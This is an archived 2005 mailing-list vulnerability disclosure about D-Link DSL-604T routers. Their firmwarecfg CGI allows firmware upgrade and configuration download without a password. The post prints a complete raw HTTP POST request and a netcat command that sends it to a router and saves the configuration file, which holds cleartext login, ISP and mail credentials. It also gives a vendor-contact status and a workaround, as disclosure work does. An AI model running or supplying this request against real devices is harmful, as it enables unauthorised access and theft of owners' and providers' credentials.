<<< Date Index >>>     <<< Thread Index >>>

504T and now also 604T remote access.



Dear ZARAZA,

the problem pointed out by Francesco Orro is completely different by the one i had. Yes, the file is the same, but if you continue reading, you can see what i just said:
the two bugs are completely different.
The one i've described can be used even if is not the first access to the router, the opposite
of what is written in Orro's mail, method of exploitation is different too.
Anyway, i found that dlink tried to fix this bug in DSL-604T series, but it seems that it
didn't so well. Here is another post about this other bug:

Device: CUSTOMER=DLinkEU MODEL=DSL-604T
Version: only tested with VERSION=V1.00B02T02.EU.20040610
Bugs: i)  remote firmware upgrade without password
     ii) config retrieval without password
Exploitation: remote
Date: 27/05/2005
Status: vendor contacted
Workaround: disable remote web management
Author: Alessandro Audero

The Bug

DSL-604T is a D-Link router/ADSL modem with a linux system on it based
on MIPS 4KEc V4.8. This is the uname that i found from the device i
tested:

Linux version 2.4.17_mvl21-malta-mips_fp_le
(tiger@xxxxxxxxxxxxxxxxxxxxx) (gcc version 2.95.3 20010315
(release/MontaVista)) #71 Tue Feb 17 01:16:45 GMT 2004

It supports a remote web management console, that at first sigth asks for
a username and a password. The URL should be something like this:

http:://ipaddress/

and if you click on 'login' you'll get this other URL:

http://ipaddress/cgi-bin/webcm

that obviously tells you that you have typed in a wrong password.

This router seems to fix previous 504T vulnerability, denying dir listing
of /cgi-bin/ and calling firmwarecfg from a password protected page.
But if you look at the source of the frame

http://ipaddress/cgi-bin/webcm?getpage=../html/tools/updgateway.htm

you can see that firmwarecfg is called with a post and that this action
is allowed even if you don't know any password.
Configuration and password retrieval is in this way possible.
You can use a POST like this:

POST /cgi-bin/firmwarecfg HTTP/1.1\r\n
Host: 192.168.8.4\r\n
User-Agent: yeah\r\n
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n
Accept-Language: en-us,en;q=0.5\r\n
Accept-Encoding: gzip,deflate\r\n
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n
Keep-Alive: 300\r\n
Connection: keep-alive\r\n
Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n
Content-Length: 234\r\n
\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="config.x"\r\n
\r\n
\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="config.y"\r\n
\r\n
\r\n
-----------------------------41184676334--\r\n
\r\n

Saving this stuff in a file and then doing something like that:

cat lamepost.txt | nc ipaddress 80 > ipaddress.config.xml

you have the router config in ipaddress.config.xml.
Same trick of the previous paper: username and password are written in
clear text, even those of the internet provider, mail, etc.

That's all, folks.


Alessandro Audero

Rhapsody